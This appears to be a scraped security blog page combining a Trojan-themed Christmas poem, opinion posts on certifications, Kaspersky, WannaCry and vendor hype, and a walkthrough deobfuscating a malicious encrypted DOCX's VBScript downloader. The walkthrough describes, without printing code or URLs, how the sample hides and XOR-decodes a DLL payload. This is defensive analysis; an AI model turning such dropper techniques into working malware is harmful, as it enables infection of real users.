By Fred Touchette, senior security analyst – AppRiver
‘Twas the night before Christmas, when all through the house
not a creature was stirring, not even a mouse.
But a laptop was open, the network logged on,
and unfortunately for its owner, his security had gone.
Unbeknownst to our user, and all others that care,
this laptop had malware it wanted to share.
It flew over wi-fi, pushed out through the router,
and started its journey, from computer to computer.
The owner worked, for a big corporate bank,
who relied on protection to shield it from pranks.
Had the virus arrived at the enterprises door,
it’s journey would be halted, and it would have infected no more.
But unluckily this story, has no happy ending,
for the virus was clever in seeking out glory.
Instead of the front door, it sneaked round the back,
climbed in through a gateway, that had already been hacked!
Now the organisation’s CISO was snug in his home,
blissfully unaware of what had gone on.
While he dreamed of presents, turkey and stuffing,
the virus had unleashed one great big fat Trojan
“Now Mac.Backdoor.iWorm! Now CryptoWall!
Now, GameoverZeus and Stuxnet!
On, Ice IX! On, SpyEye!
On, Torpig and Carberp!
Slide through the ethers!
And infect one and all!
Now cash away! Cash away!
Cash away all!”
While networks lay slumbering, unaware of the risk,
the code was changed slightly, so nothing seemed to be amiss.
But of course, being Christmas, someone would get a surprise
But only if they looked hard, at the damage inside.
No account would be breached,
no coins would be pilfered.
Instead, far more damaging,
credentials were taken.
Sat at home, at his desk, dressed in furs black as ink
The code writer sat, and prepared for a stint.
Lights blinked, alarms sounded, and cogs started whirring,
as over the sky came information, unending.
The credentials arrived first, number one on his list,
then came account details with how much sat in each.
From here what was required, was dexterity, and more
complicated coding to slip through the door.
Back in the bank, not an alarm had he tripped,
so the next stage of his plan he gleefully unleashed.
The Trojan allowed him to travel back in,
to the heart of the building, to plunder within.
The money, he’d steal, from accounts big and small.
He’d hide each transaction, no suspicion would fall.
Once everything was set, with no stone left unturned,
He could slip in and out, as and when, at his will.
Back at his desk programming and streaming,
he worked hard to ensure his code was unrevealing.
He wiped, and he cleaned, he scoured and he scrubbed.
He obscured the Trojan, it was as if he’d worn gloves,
He sat back from his screen, and gave a strange giggle,
And the tunnel he’d created, it dimmed and it dwindled.
But I heard him exclaim, as he spun out of sight,
“Happy Christmas to all, and to all a good night!”
The dsplice
Monday, December 24, 2018
Merry Christmas 2018
Sunday, April 1, 2018
Degrees, Certifications, and Papers, Oh My!
Infosec Certifications, Worth The Paper They Are Printed On?
A few months ago I was reading a lot of posts about the value, (or lack thereof), of degrees in infosec. That really got me thinking. What value does education have that comes with a little piece of paper?
To start with, a little of my background. I come from a fairly tried and true infosec path. I went to university and received my Bachelor of Science with Computer Science. I didn't like programming (as was the focus of Comp Sci degrees of the day) so I decided to go the System Admin route. I spent a number of years in this field (including *shudder* management) and by all accounts was quite successful. Eventually though I felt the 'pull to the light' of infosec. I started doing more and more security duties and eventually worked my way into full time. At that point I studied, and got my CISSP, and eventually moved on to SANS where I obtained a number of certifications including the coveted GSE. Anyone who looks at my profile will note, I have quite an alphabet behind my name. With this, most people would automatically expect me to be on the high road of infosec certification.
But here is the kicker, I am really not. As a person who has done a lot of hiring over his years, I have hired the majority of my best people, without ANY (at least without a LOT) infosec certifications. Ok, I know I am a Gemini, but why the discrepancy? It all goes down to a few things that will become clear further down. For now, let us dive into the types of certifications, and different purposes for getting them.
Types of Paper:
- Comp Sci/General University Degrees
- Infosec Degrees
- Vendor Specific Certifcations
- Vendor Neutral Certifications
1. Again, my personal experience is with the first one. In my day (and location), a comp sci degree was all that was available to me. And as a whole, it was worth it. I learned a lot, and not just about computers. I learned HOW to learn. Discovered my own particular learning style and why high school was such a hard time for me. Some of the most important lessons I took from my time in university were how to use logic, how a microprocessor worked, and the design of the Unix operating system. These skills are not directly used in my current job, but the learnings obtained, are the foundation for just about everything I do. Many of my colleagues ask me how I manage to figure out some very complex items, and I am almost always telling them about what I learned in university.
2. Ok, now this one I have no personal knowledge of, so please forgive me if I butcher or say stuff that is totally out of line. Infosec degrees are a relatively new phenomenon. Yes I do realize that many have been around for over a decade, but in my day, they did NOT exist. I have mixed feelings about them. And I think a lot of this 'mixture' has to do with the varying quality I see in programs. In some cases, I see a "Master's" level program that appears to teach the very basics of Cisco firewalls and IDS', and other "Bachelor" level ones that appear to get into the theoretical side of threat and risk. In one case, I have been told by the dean of one of the Master's degrees, that I would not learn anything from it. So in essence it would be an (highly) expensive piece of paper. Yet I have been turned down from opportunities because I did not have it.
3. Many people have experience with this one. And not all 'vendor specific' training needs to be just product specific. Cisco, Microsoft, {insert security appliance vendor name et nausium} often do a very good job at explaining the 'why' part of the equation rather than just the 'what'.
4. Lastly, we come to vendor neutral. Many times vendor neutral certifications are very similar to good quality vendor specific ones, just without relying on one particular vendor. I find they often focus more on the why than the what. This to me is a big benefit, however for many others, can be quite the opposite. Some of this might become clearer later on as well.
Why Certify?
Like there being many different types of certifications, there are many different reasons for certifying. I will talk about the types I have discovered. Many times people are a mixture of more than one as the need may encompass various requirements.
- HR Filter Bypass
- Technical Filter Bypass
- Financial
- External Bragging Rights
- Internal Bragging Rights
1. HR Filter Bypass is relatively straight forward. In many cases, HR and hiring companies have teams of people, who's only job is to screen candidates and put forward those who meet the minimum filter. If candidate X does not have N years of experience with technology T, drop 'em. Seems unfair to many of us but this is simply how business works. There may be companies more forward thinking and able to see beyond this, however they are VERY few and far between. A good example of a HR Filter Bypass certificate is the CISSP (sorry ISC2). In my 12 years of having it, I have never learned anything in getting it (save some level-setting on some terminology), and have only ever used it as getting past HR. As far as I am concerned, it is useless for everything else, yet I will keep renewing it until it is no longer needed.
2. Technical Filter Bypass is the next level up. You have gotten past the HR stiffs (sorry my friends in HR), and now have your resume sitting in front of someone that at least knows something about infosec. Likely this will be the hiring manager or team lead. They likely have 20-100 resumes sitting in front of them. And as we humans are naturally lazy, we will want to find the quickest way to go through the list to narrow it down. Examples of this are varied depending on the position. Items like Security+, CISA/CISM, GSEC etc are some that I often see used as this. Doesn't mean they cannot describe a valuable skill or knowledge, but are used to trim down the pile until the hiring manager gets to people they want to at least interview.
3. Financial is quite easy. In some organizations (which I find shrinking as time goes on), certain level of certifications or degrees, come with a financial benefit. This can be a bonus, higher base base, or even ability to move upwards through the infosec ladder. I usually find this more in the upper regions of education like MBA and a Master's in Infosec. Nuff said on this one.
4. External Bragging Rights again is quite easy. This is to satisfy the need to try to show that a person is smart, better than someone else, or a person who just likes to justify why everyone should listen to them. Please note though, this is not always a bad thing. Human beings are competitive creatures by their very nature. We like showing the fact that we have achieved a certain level or milestone. After all, we (usually) put in a lot of effort, time, and money to get their. I will even admit to this one myself. I like others to know what I can do, and yes I do think that sometimes my ego needs to be a lot more humble (something I am actively working towards). This is not a problem unless it becomes the ONLY (or main) reason for certifying. If you only obtain something for the benefit of telling others, you are REALLY in the wrong field. We have a lot of legitimate 'rockstars' in infosec, fakers are quickly called out and shunned (*cough* Simon Smith *cough*).
5. Lastly, Internal Bragging Rights. I know what you are thinking, "What the F**K is he talking about?". I have included this one for a couple of reasons. First, not many people would understand what this is about, and two, I am a 'victim' of it as well (and can be referenced in my previous postings. (ImNotWorthy). I personally suffer from Imposter Syndrome in a huge way. In fact my whole thought process around starting to blog was my attempt to overcome it. I constantly find myself doubting my own skills, knowledge, and even experience. I was even told (with my parents present) by my vice principal that I would not succeed in any academic venue, and should just accept the fact that I would only be good at manual labor. Talk about killing any dreams of a future. So based on this, I found myself wanting to constantly learn new things. I am not happy anywhere I am not learning. But learning is only part of the battle for someone who feels they are just 'faking it'. So I often use certifications to try to prove to myself that I can actually do this. That I ACTUALLY know something. This past fall I even received the GSE (GIAC Security Expert) certification after a long and hard lab. Less than 200 people have EVER been awarded this in the past 13 years of the certifications existence. Yet, even after all of that, I still feel I need to prove to myself, that I am not the 'Imposter'.
Last Thoughts
I know this subject, has a lot of different opinions. And in online threads and discussions, has some very passionate and heated feelings. I hope my ramblings might help others see that different ideas about certification are often based on who you are, where you come from in infosec, and where you are trying to go. No one answer is right for anyone else, but can be used to help others decide what is right for them.
Update August 22, 2018
Found this article this morning. Google, Apple and IBM are looking at dropping college degree requirements from their hiring practices. I personally think this is a move in the right direction, as hiring practices should be based on hiring the BEST candidate for a job. No matter what 'stream' they come from!.Saturday, October 14, 2017
Kaspersky, Evil or Not
Kaspersky, Russian Agent or just Russian?
With all the mess that seems to be raging about the validity of Kaspersky AV products, I thought I would pen (yet) another opinion piece.
Latest news around the tube is that Israel hackers had broken into Kaspersky's infrastructure and found evidence of Russian government actors inside looking for information that could be used for geopolitical interests.
First, a couple of things... AV software, being generally seen as a necessary evil, is installed on practically ALL system (well if not, it probably should). Why is this? Simple, due to the ubiquity of malware with all sorts of purposes, it is a significant threat. Most (if not all) cyber attacks either start with, end with, or are comprised entirely of malware. AV is so universal due to that threat.
If you are a home user, that is pretty much where the threat model ends. So what do you do? You go and install the best protections you can afford and effectively work with. Kaspersky has show in many tests to be highly capable in this regards. It has been shown to have very high coverage, extremely low false positives, low system impact, and fast new signature releases (http://chart.av-comparatives.org/chart1.php)
I personally suggest Kaspersky for this standard use-case. Why? Simple, it works. Is it for everyone? Of course not. Why? Well just read on! :)
Now how about for other use cases? If you are a business? Well again, depends on the threat model you are protecting against. Standard business with a very small amount of intellectual property? Probably similar to a home user. If you have LOTS of very sensitive intellectual property, then different decisions may need to be made. Does this mean no Kaspersky? Well if you are a Russian company, I would hazard a guess you are probably not as worried. If you are a US company, maybe.
This brings us to another point... Russian government actors inside of Kaspersky. Does any one else remember when the US government was intercepting Cisco shipments to other countries to install backdoors? (https://arstechnica.com/tech-policy/2014/05/photos-of-an-nsa-upgrade-factory-show-cisco-router-getting-implant/) If anyone tries to make believe that other countries do not do similar things given the opportunity, there are lots more examples to be shown. AV companies are all of high interest to hackers. AV is everywhere, and has access to everything. As an occasional pentester, AV is my FAVORITE target. Nothing like turning a protection around on itself.
So this brings us back to, "what do I do?" Well my main suggestion is to consider what you have of value that would be enticing to steal? If you have lots, then perhaps using a reputable AV company with offices and infrastructure belonging to our own country. US? Try using a US company. Russia? Try using a Russian company.
Lastly, the whole point of this is simple. AV software is a required protection mechanism. However it is also a threat vector. Always consider everything when looking at your risks.
Don't give into FUD, for FUD is a path to the dark side!
D
Tuesday, May 16, 2017
WannaCry Reflections
WannaCry Technical
Sorry, your not going to find loads of technical information here in this post.
Ok, So Non-Technical
Alrighty then. As the above indicated, this article is not going to be going into the technical guts of the (now) infamous worm that wrecked havoc and cancelled so many weekend plans. There has been lots of articles (and alot of FUD) writen about it already. Much of it by people who do not get paid directly to work with malware. A quick Google search will show you more than you can ever handle.
People Involved
I wanted to focus some attention on the people involved in dealing with this nasty little worm. And no, I am not offering biographies on individuals. Rather I wanted to say how impressed I was with the infosec community as a whole. People, from all walks of life, different countries, timezones etc came together to work on the problem.
Even before the worm started spreading, there were individuals who raised alarm over the fears that the vulnerability exploited by the worm. People on Twitter stated that this one would be bad, "our next MS08-067". I doubt that many of them could have even guessed how much damage would be wrought.
It shouldn't be too surprising. A vulnerability within a pervasive protocol, which would allow for remote code execution and give an attacker full SYSTEM level control, would be too tempting a target for anyone with malicious intent.
Added to the mystic, was the fact that this flaw was found (and likely utilized) by none other than the NSA. Only to be stolen and later released by the ShadowBrokers.
What a perfect storm. Who'd a thunk it?!?! Well as we all know, it didn't take long before someone weaponized it, and added a self-replicating ability.
Throughout the community, people came together to raise the alarm. Then to analyze the malware and give technical information as to its capabilities. Then to even work to help neuter the malware with its famous 'kill switch'. Attribution has been attempted, however I think that effort will go on for a long time to come.
In the meantime, defenders are still working hard to stop the infection, apply patches and help reduce the impact of this worm.
Impact
The impact of the worm will definitely be hard to measure. We have heard lots of people state that they believe it is the most destructive event in infosec. I tend to agree. While I do not have numbers, the ability of the worm to target sensitive files and spread has to give it an edge. Other worms were definitely more 'disruptive', however many of them still failed to to give the lasting impact of having all of your valuable data rendered unrecoverable.
The Future
As I have stated before, let no disaster go unused. There will be good to come out of this.
First, the importance of patching and keeping OS's updated will likely not be forgotten easily. Even in hard to patch devices like embedded systems (MRI machines anyone?). At the very least it gives us a data point to show people a quantifiable cost is for the risk.
Secondly, our "blue teams" importance will be cemented within the mindset of C-level executives. Yes we may be a 'cost center', however we will firmly be labeled as an important factor in risk reduction. Again, being able to show, in quantifiable numbers, your value to an organization, is KEY to C-levels understanding.
Thirdly, the importance of working together, worldwide, has been shown. We are much stronger standing together and working collaboratively than we are apart. We can come together and truly have a positive impact on worldwide information security. My hope is, that this realization will empower organizations to open up more, to share information more freely. To give their employees time (and more importantly money) to go and do those things that do not always benefit the company directly, by helping out the world community. We are so connected and inter-dependent on each other that the more we collaborate, the stronger we all become.
A Final
I wanted to express my thanks to several people, but wanted to call one out in particular. @MalwareTechBlog, the individual who (at least at first) accidentally registered the first worm's kill site. He showed what we should strive for. He helped out tremendously, and not just for the kill site. But for his technical analysis of the worm, and even more so for his work coordinating between several global organizations to help protect and help people who were infected. Added to that was the fact that after been given $10K, for his excellent work by @Hacker0x01 he stated it would be split between charities and for education stuff for others. A true class act! A beer on me anytime we meet dude!
Monday, May 8, 2017
World Class or Local Class
Again, apologies for another opinion piece. Again this one has bugged me for a long time.
One of the trends I have noticed for the past 4 or 5 years, have been recruiters calling me up, stating they are looking for 'world class' talent. Senior skills and people which are hard to find. Of course they are hard to find. There are not as many rockstars in any field, as there are simple rocks. Yet, companies continue to insist they want this talent LOCAL to them.
This makes no sense to me. If you are looking for diamonds, you do not strip mine a whole area determined to find them.... You go where THEY are! You spend the time and effort to go to where they exist, and work your magic.
Skilled talent, especially in senior levels are not easy to find, and sometimes impossible to find in your area. Yet when you find someone, you tell them they have to move. This is wrong in so many levels. If you want 'world class' talent, they need to be able to work from anywhere in the 'world'. Please do not bother me with claims stating how cool your company is, or how you only hire the best, when you refuse to allow them to work from wherever they are. This is key.
If you do not have a remote work ability, don't waste my time. Professionals are professionals no matter where they are. They work hard and have no need for someone to keep looking over their shoulder to ensure they are doing what they are paid for. Professionals are passionate. They will be no matter where they are in relation to their boss, director, peers, customers etc.
Another Ramble
I have been in the infosec field a fairly long time. In addition, I have put myself out there through postings, email, social media, etc. So I think it is safe to say I have a fairly large target on me in terms of recruiters and people looking for 'skilled' talent.One of the trends I have noticed for the past 4 or 5 years, have been recruiters calling me up, stating they are looking for 'world class' talent. Senior skills and people which are hard to find. Of course they are hard to find. There are not as many rockstars in any field, as there are simple rocks. Yet, companies continue to insist they want this talent LOCAL to them.
This makes no sense to me. If you are looking for diamonds, you do not strip mine a whole area determined to find them.... You go where THEY are! You spend the time and effort to go to where they exist, and work your magic.
Skilled talent, especially in senior levels are not easy to find, and sometimes impossible to find in your area. Yet when you find someone, you tell them they have to move. This is wrong in so many levels. If you want 'world class' talent, they need to be able to work from anywhere in the 'world'. Please do not bother me with claims stating how cool your company is, or how you only hire the best, when you refuse to allow them to work from wherever they are. This is key.
If you do not have a remote work ability, don't waste my time. Professionals are professionals no matter where they are. They work hard and have no need for someone to keep looking over their shoulder to ensure they are doing what they are paid for. Professionals are passionate. They will be no matter where they are in relation to their boss, director, peers, customers etc.
Final Point
If you are not allowing your professionals to work from anywhere in the world, you are NOT looking for world class talent. Please stop bothering me and others with your HR shit speaking! I am good at what I do, VERY good. If you want me, take me. If not, GTFO, I'm busy....Saturday, May 6, 2017
Of Snakeoil and Infosec
To start, apologies for posting another opinion piece. This topic has been bugging me for a while, and along with a post by another security blogger last week, I felt it needed to be said.
To all infosec vendors, hardware, software, and services....
Please check your grand claims and marketing bullshit at the door. There is no need for it. If your product/service is good, we in the community will know it. We will talk about it. We will BUY it... However, if you use terms like 'unhackable', 'unbreakable', '100% secure'.... We will ALSO talk about it, but not in your favor. Nor will be 'buy' it. Shit claims like this is why you (and especially your marketing division) are the laughing stock of the rest of the world.
First
NOTHING is unbreakable (Sorry Oracle, you of all companies should know this is BULLSHIT). If you claim that your product is 100% secure, EXPECT me to test it. I will, and I will find its flaws. And of even greater threat, I WILL publish findings.
The recent article by Scott Helme about nomx (https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/) was the catalyst for me to write this. Too many times vendors make grand claims to sell blinkenlights. Products or services to 'solve' the security problem. If you make the claim, have the balls to back it up, or shut up. You are directly responsible for your customers current security issues. They trust you, believe you, buy into you. And what do you do? You sell them snake oil. Magical cures which in the end, do more harm than good.
Second
So that brings me to a second point. If a researcher, or anyone, goes through the work to point out the flaws in your 'widget', man up and respond with respect. These guys often have more knowledge and have done more work to secure your products than your whole security team. Responding with threats of litigation, defamation against their skills or character, will not only NOT win you friends, but will actively turn the community against you. The best defense is not always a good offensive. It just proves you are an offensive company that should be avoided.
Scott's article is not the only example of such actions being taken. Infosec history is LITTERED with examples. (https://www.wired.com/2013/04/ciphercloud-stackexchange/ was a personal favorite). Even I myself have been accused of false claims against a company when I exposed a companies claims of 'best of breed' encryption to be rubbish.
Thoughts of a Conclusion
This got me thinking. Why would a company fight so hard against the community that has conclusively shown their product or service is flawed. And it hit me....
If you are a honest infosec vendor, you know it's best to work with the community, not against it. There are thousands of people who would be willing to put forth hard work to help improve security, no matter where it is. You know it will be worth the effort because the effort is worthwhile.
If you are a snakeoil salesman, a researcher pointing out flaws is threatening you with extinction. So I can see why you would fight so hard. Just know, there are no perfect secrets, all truth comes out, and everyone will get what they truly deserve in the end. Stop before you start, you are not smarter than the rest of the world, we WILL figure you out!
Monday, April 24, 2017
More Malicious Docs, Oh My!
Introduction
Ok, I know malicous documents, specifically .DOC, so how is this one different? Well, we will get to that in a bit. I wrote this posting as more of an introduction to Visual Basic script deobfuscation and hope others might find it useful/interesting.
Initial Detections
It all started with many users reporting suspicious emails. These emails were a little different from the usual "Open this email and enable macros to view the content".
First, these emails contained a .DOCX rather than the older .DOC or a .DOCM. Ok, that is odd.
Secondly, they were encrypted. The email they were attached to, gave instructions on how to open the email with the password.
Initial Analysis
So the first thing done, is to see what VirusTotal and Hybrid-Analysis have on this encrypted document. Let's see....
Not starting so good....
Maybe Hybrid has more....
Ok. So nothing much from any of the usual online sources.... To doublecheck, lets try some of our commandline tools.
So, it is a valid OLE document, however has no macros to speak of. One issue I noticed, is that OLEID states that the file is not encrypted and not a Word document. I will follow up on this in the near future.
Decrypting DOCX
So lets see about getting something useful outta this... To do this, it was quite easy. I could have used MS Word, however to be a bit safer, lets use LibreOffice....
First, we are presented with this
Ok, once the (correct) password is entered, we finally see the true document....
Interesting. Seems the document has 3 embedded objects. We will work on those in a bit. First, lets see what our tools say about the document NOW!
Ok, now that looks ALOT more malicious. So far so good I would say. What more can we tell though? Those embedded OLE objects look very suspicious. Lets check it out...
OLEVBA states there is no macro. Ok, so not using macros... Lets see what other tools we have will tell us....
Ok, OLEDUMP tells us a bit more. Three objects embedded. And they all seem to have the same sizes. Lets extract them and run a cryptographic hash to see if they are indeed the same....
So looks like standard Visual Basic Script, although obfuscated. Ok, so now here is where the fun begins....
Visual Basic Deobfuscation
First thing I decided to do, was load the script up in Notepad++ and turn on syntax highlighting
I find syntax highlighting helps alot. So first thing I like to do, is to start cleaning up the silly cAmElCaSe I see in the document (a simple find/replace works nicely), and put some extra whitespace between all of the functions and subroutines...
Ok, that is a bit better. First thing I notice, is the use of mathematical functions. Most likely it is used to represent simple numbers. Lets go and take care of all of those....
The KyVrqqM function being called here looks ALOT like some sort of decryption routine. Will look at this in a bit.
Another thing I noticed while doing the original deobfuscation, is that there appears to be a bunch of junk instructions.
This pattern repeats (with different variables and data) over and over and over again. When examining the variables, they are only used within these three lines. Which means they are essentially a "Do Nothing" collection of instructions. Lets delete them and see what that does to the size of our script...
WOW, doing just that, the file has gone from 464 lines, to just 170. This also revealed some other 'complication' techniques, like using a function to call a single function. We can simplify that further...
Lets see where OgkD is called, and convert it into a simple Mid itself (there are a few different functions that do this, including one for Asc, and Chr). Lets do them all and see what happens...
Down to 158 lines. So fewer gains but still, lets continue! Next I look for variables that are set but next used (a simple find or count should indicate it is safe to delete. Then I look for variables that are set to a static piece of data and then used elsewhere (non-mutable). Those can be substituted with no effect.
Down to 101 lines. That is alot of junk. Probably more there that could be removed, but so far, looks like a job well done. Code is much more readable and it is becoming clearer this script is meant to download something, write it to a file and do something with it.
One item that keeps coming up, over and over again, is this:
I am pretty sure this is some sort of decryption given the field "encodedtext", "key", offset1, offset2. Lets copy these to another file along with the function....
Two extra functions had to be added in. Looks like a mathematical one, and a possible xor script. Lets run and see what it gives...
Now that is Interesting. We have a couple of http strings, along with some commands designed to run DLLs....
Downloaded Payload
Now lets try to download those files and see what they give us...
Hmmm, the first link gives us a binary file. The 'file' command only lists it as 'data' Not very useful. What about the second file? Well that was time wasted. Unable to find a copy of the file at all. So lets start on that first one.
The file shows up in VirusTotal interestingly enough. Still not a true virus, but enough people know about it to show us something.
Something smells familiar though. My hunch is it has been xor'ed. I see some xor like function in the Visual Basic script, but I am feeling a bit lazy. Back to one of Didier's programs, XORSEARCH.
Ok, now that was easy. Lets see if we can find 73 anywhere in our script? No dice.... Oh but wait, convert from hex to decimal gives us 115. Lets look that up.... BINGO!
Looking at that last line, I noticed that the YS function appears to be that same one that looked like an XOR function. Guess I was right. XORed given ascii representation of Xb808 with 115 being the decimal key.
So, lets XOR this file and see what pops out on the other end. For this I will use Didier's tools again (xorsearch -p -s xoredfile.bin)
So this finally gives us our DLL! So lets look at what VT has to say about it....
So definitely a naughty little program. I will end it here as my DLL reversing is not yet up to where I want to post publicly about it :) Hopefully later... Hope you enjoyed!
Shout Outs
Here I want to put in a few links and shout outs to places, and tools that I have used and helped me out through my work here.
Edit 1
I was asked on a mailing list of mine to put in some more text. Well this might not be what he wanted, but thought I would upload a little ugly sed sled (you will see why) to help with the camel case and break things apart a little....
sed 's/function/Function/Ig' | sed 's/set/Set/Ig' | sed 's/end/End/Ig' | sed 's/if/If/Ig' | sed 's/do/Do/Ig' | sed 's/and/And/Ig' | sed 's/write/Write/Ig' | sed 's/read/Read/Ig' | sed 's/responsebody/ResponseBody/Ig' | sed 's/then/Then/Ig' | sed 's/else/Else/Ig' | sed 's/dim/Dim/Ig' | sed 's/sub/Sub/Ig' | sed 's/create/Create/Ig' | sed 's/object/Object/Ig' | sed 's/textfile/TextFile/Ig' | sed 's/environment/Environment/Ig' | sed 's/get/Get/Ig' | sed 's/asc/Asc/Ig' | sed 's/chr/Chr/Ig' | sed 's/mid/Mid/Ig' | sed 's/error/Error/Ig' | sed 's/true/True/Ig' | sed 's/status/Status/Ig' | sed 's/resume/Resume/Ig' | sed 's/send/Send/Ig' | sed 's/open/Open/Ig' | sed 's/next/Next/Ig' | sed 's/for/For/Ig' | sed 's/ to / To /Ig' | sed 's/type/Type/Ig' | sed 's/savetofile/SaveToFile/Ig' | sed 's/close/Close/Ig' | sed 's/loop/Loop/Ig' | sed 's/err.number/Err.Number/Ig' | sed 's/until/Until/Ig' | sed 's/End Function/End Function\n/g' | sed 's/End Sub/End Sub\n/g'
Subscribe to:
Posts (Atom)